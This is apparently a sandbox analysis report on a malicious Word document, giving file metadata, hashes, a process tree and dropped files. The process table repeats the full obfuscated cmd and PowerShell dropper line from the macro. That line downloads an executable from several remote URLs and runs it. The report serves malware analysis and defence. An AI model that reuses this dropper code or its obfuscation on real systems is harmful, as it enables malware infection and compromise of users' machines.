File name: | FA038071_36.doc |
Full analysis: | https://app.any.run/tasks/92dd7378-e239-48e4-89a6-a843922fe022 |
Verdict: | Malicious activity |
Analysis date: | January 17, 2019, 16:31:05 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Jan 16 11:40:00 2019, Last Saved Time/Date: Wed Jan 16 11:40:00 2019, Number of Pages: 1, Number of Words: 13, Number of Characters: 80, Security: 0 |
MD5: | 8CF1ECA3CE29415BBBDC9402F0081193 |
SHA1: | F28F29965C0735D240FC281842DE779EFD52CA7E |
SHA256: | F2D9DD503F6F96EBE5E0CD82B1F035E3321A2A8EFD1EDDEB126386DC73071312 |
SSDEEP: | 768:KVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFB3MB4zy2Gf37mYCp4DXUyZpOGanwrQ:Kocn1kp59gxBK85fBU4oXAwohX+a95 |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:01:16 11:40:00 |
ModifyDate: | 2019:01:16 11:40:00 |
Pages: | 1 |
Words: | 13 |
Characters: | 80 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 92 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2808 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\FA038071_36.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
924 | "C:\Windows\system32\cmd.exe" /c %pROgRaMdATA:~0,1%%PrOgrAMDATa:~9,2% /V:On /r" Set 6bsD=p.w^%PUBLI`c~5,1^%\^%SESSIONNAMEc~-4,1^%h^%_EMPc~-3,1^%ll $NZGti.nZGl9l='?.9ileli';$_unisiZGwi=new-.9je[t Net:We9`lient;$.liveuws='httpc//www:.desZGg\.up:[.?/[6f#hPN7@httpc//ev.queZG\t:[.?/Wk0MdRvGuwW@httpc//lept.ku\t.sis:[.?/w?K5ZKF?inG@httpc//?i?iZG9ne\:[.?/tvp\RKd_@httpc//kids-edu[ZGti.n-supp.\t:[.?/ZKFuwlOlfNSSF':Split('@');$s[he?ZGsiw='UsZG9ilityuws';$Isleiw = '420';$v.\tZGlsluw='vi\tuZGlsf';$Av.n9j=$envcpu9li[+']'+$Isleiw+':exe';f.\eZG[h($Est.niZGll in $.liveuws){t\y{$_unisiZGwi:4w.wnl.ZGdFile($Est.niZGll, $Av.n9j);$input\d='PennsylvZGniZGfq';If ((Get-Ite? $Av.n9j):length -ge 80000) {Inv.ke-Ite? $Av.n9j;$B.\de\swp='?.9ileZGk';9\eZGk;}}[ZGt[h{}}$?eth.d.l.gyZGp='we9\eZGdinessfu';& sEt vkp=!6bsD:.=o!&& sEt Db=!vkp:uw=z!& SEt wzu=!Db:ZG=a!& seT 8d=!wzu:6=J!& SeT lJ=!8d::=.!&& SET f4=!lJ:c=:!&& seT 9R=!f4:[=c!&seT HFMG=!9R:#=6!&& seT mAj9=!HFMG:_=T!&&SET ZxJC=!mAj9:?=m!&& SeT Hwk=!ZxJC:ZKF=X!& SeT w6=!Hwk:4w=D!&SET Lv=!w6:9=b!&& SET jI5Q=!Lv:\=r!&sEt DR=!jI5Q:`=C!& SET QcHS=!DR:]=\!&& eChO %QcHS% | %comMONpROgrAMFIlEs(x86):~-12,1%MD " | C:\Windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 255 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2704 | CmD /V:On /r" Set 6bsD=p.w^%PUBLI`c~5,1^%\^%SESSIONNAMEc~-4,1^%h^%_EMPc~-3,1^%ll $NZGti.nZGl9l='?.9ileli';$_unisiZGwi=new-.9je[t Net:We9`lient;$.liveuws='httpc//www:.desZGg\.up:[.?/[6f#hPN7@httpc//ev.queZG\t:[.?/Wk0MdRvGuwW@httpc//lept.ku\t.sis:[.?/w?K5ZKF?inG@httpc//?i?iZG9ne\:[.?/tvp\RKd_@httpc//kids-edu[ZGti.n-supp.\t:[.?/ZKFuwlOlfNSSF':Split('@');$s[he?ZGsiw='UsZG9ilityuws';$Isleiw = '420';$v.\tZGlsluw='vi\tuZGlsf';$Av.n9j=$envcpu9li[+']'+$Isleiw+':exe';f.\eZG[h($Est.niZGll in $.liveuws){t\y{$_unisiZGwi:4w.wnl.ZGdFile($Est.niZGll, $Av.n9j);$input\d='PennsylvZGniZGfq';If ((Get-Ite? $Av.n9j):length -ge 80000) {Inv.ke-Ite? $Av.n9j;$B.\de\swp='?.9ileZGk';9\eZGk;}}[ZGt[h{}}$?eth.d.l.gyZGp='we9\eZGdinessfu';& sEt vkp=!6bsD:.=o!&& sEt Db=!vkp:uw=z!& SEt wzu=!Db:ZG=a!& seT 8d=!wzu:6=J!& SeT lJ=!8d::=.!&& SET f4=!lJ:c=:!&& seT 9R=!f4:[=c!&seT HFMG=!9R:#=6!&& seT mAj9=!HFMG:_=T!&&SET ZxJC=!mAj9:?=m!&& SeT Hwk=!ZxJC:ZKF=X!& SeT w6=!Hwk:4w=D!&SET Lv=!w6:9=b!&& SET jI5Q=!Lv:\=r!&sEt DR=!jI5Q:`=C!& SET QcHS=!DR:]=\!&& eChO %QcHS% | %comMONpROgrAMFIlEs(x86):~-12,1%MD " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 255 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2980 | C:\Windows\system32\cmd.exe /S /D /c" eChO %QcHS% " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3388 | "C:\Windows\system32\cmd.exe" | C:\Windows\system32\cmd.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2288 | "C:\Windows\system32\cmd.exe" /c CmD /V:On /r" Set 6bsD=p.w^%PUBLI`c~5,1^%\^%SESSIONNAMEc~-4,1^%h^%_EMPc~-3,1^%ll $NZGti.nZGl9l='?.9ileli';$_unisiZGwi=new-.9je[t Net:We9`lient;$.liveuws='httpc//www:.desZGg\.up:[.?/[6f#hPN7@httpc//ev.queZG\t:[.?/Wk0MdRvGuwW@httpc//lept.ku\t.sis:[.?/w?K5ZKF?inG@httpc//?i?iZG9ne\:[.?/tvp\RKd_@httpc//kids-edu[ZGti.n-supp.\t:[.?/ZKFuwlOlfNSSF':Split('@');$s[he?ZGsiw='UsZG9ilityuws';$Isleiw = '420';$v.\tZGlsluw='vi\tuZGlsf';$Av.n9j=$envcpu9li[+']'+$Isleiw+':exe';f.\eZG[h($Est.niZGll in $.liveuws){t\y{$_unisiZGwi:4w.wnl.ZGdFile($Est.niZGll, $Av.n9j);$input\d='PennsylvZGniZGfq';If ((Get-Ite? $Av.n9j):length -ge 80000) {Inv.ke-Ite? $Av.n9j;$B.\de\swp='?.9ileZGk';9\eZGk;}}[ZGt[h{}}$?eth.d.l.gyZGp='we9\eZGdinessfu';& sEt vkp=!6bsD:.=o!&& sEt Db=!vkp:uw=z!& SEt wzu=!Db:ZG=a!& seT 8d=!wzu:6=J!& SeT lJ=!8d::=.!&& SET f4=!lJ:c=:!&& seT 9R=!f4:[=c!&seT HFMG=!9R:#=6!&& seT mAj9=!HFMG:_=T!&&SET ZxJC=!mAj9:?=m!&& SeT Hwk=!ZxJC:ZKF=X!& SeT w6=!Hwk:4w=D!&SET Lv=!w6:9=b!&& SET jI5Q=!Lv:\=r!&sEt DR=!jI5Q:`=C!& SET QcHS=!DR:]=\!&& eChO %QcHS% | %comMONpROgrAMFIlEs(x86):~-12,1%MD " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 255 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2544 | CmD /V:On /r" Set 6bsD=p.w^%PUBLI`c~5,1^%\^%SESSIONNAMEc~-4,1^%h^%_EMPc~-3,1^%ll $NZGti.nZGl9l='?.9ileli';$_unisiZGwi=new-.9je[t Net:We9`lient;$.liveuws='httpc//www:.desZGg\.up:[.?/[6f#hPN7@httpc//ev.queZG\t:[.?/Wk0MdRvGuwW@httpc//lept.ku\t.sis:[.?/w?K5ZKF?inG@httpc//?i?iZG9ne\:[.?/tvp\RKd_@httpc//kids-edu[ZGti.n-supp.\t:[.?/ZKFuwlOlfNSSF':Split('@');$s[he?ZGsiw='UsZG9ilityuws';$Isleiw = '420';$v.\tZGlsluw='vi\tuZGlsf';$Av.n9j=$envcpu9li[+']'+$Isleiw+':exe';f.\eZG[h($Est.niZGll in $.liveuws){t\y{$_unisiZGwi:4w.wnl.ZGdFile($Est.niZGll, $Av.n9j);$input\d='PennsylvZGniZGfq';If ((Get-Ite? $Av.n9j):length -ge 80000) {Inv.ke-Ite? $Av.n9j;$B.\de\swp='?.9ileZGk';9\eZGk;}}[ZGt[h{}}$?eth.d.l.gyZGp='we9\eZGdinessfu';& sEt vkp=!6bsD:.=o!&& sEt Db=!vkp:uw=z!& SEt wzu=!Db:ZG=a!& seT 8d=!wzu:6=J!& SeT lJ=!8d::=.!&& SET f4=!lJ:c=:!&& seT 9R=!f4:[=c!&seT HFMG=!9R:#=6!&& seT mAj9=!HFMG:_=T!&&SET ZxJC=!mAj9:?=m!&& SeT Hwk=!ZxJC:ZKF=X!& SeT w6=!Hwk:4w=D!&SET Lv=!w6:9=b!&& SET jI5Q=!Lv:\=r!&sEt DR=!jI5Q:`=C!& SET QcHS=!DR:]=\!&& eChO %QcHS% | %comMONpROgrAMFIlEs(x86):~-12,1%MD " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 255 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2800 | C:\Windows\system32\cmd.exe /S /D /c" eChO %QcHS% " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3752 | C:\Windows\system32\cmd.exe /S /D /c" eChO %QcHS% " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2808 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9224.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2808 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9A8341ED.wmf | — | |
MD5:— | SHA256:— | |||
2808 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E3491783.wmf | — | |
MD5:— | SHA256:— | |||
2808 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DC2ADA9C.wmf | wmf | |
MD5:FC787222CE5B4CC4CAD31B79C3C2348E | SHA256:8B5397118F6F9D1330C73A0521108988C59B8AB9BCF5EE338E33D31C5BBE2F40 | |||
2808 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:A78D8F9A2177366796F0334082A6178D | SHA256:5AE7E2762BC23A5EEE925C924F34C589BDA230A52A6F1FA5E392BD8DC0AE1B8D | |||
2808 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9513C70A.wmf | wmf | |
MD5:C1CEE3313A9A055AB269356C788D2F4B | SHA256:3F992E7FE3B9E39827132318CFDEFC810946B81F80CA09B24E494C5B47A56F3F | |||
2808 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$038071_36.doc | pgc | |
MD5:231D4B930E7331F02060D41DD9ED947F | SHA256:6077F2986D73D260B5383AB4F17B86545F3505A5A6628B2D3BC7AB0FB915CDEE | |||
2808 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:57EF33A4E40DD22385BB3E357F26E8BE | SHA256:3D5C1C7A266AA54341ACA11732CD12090B84B00FF95A8A980817DA4F21B95AD6 |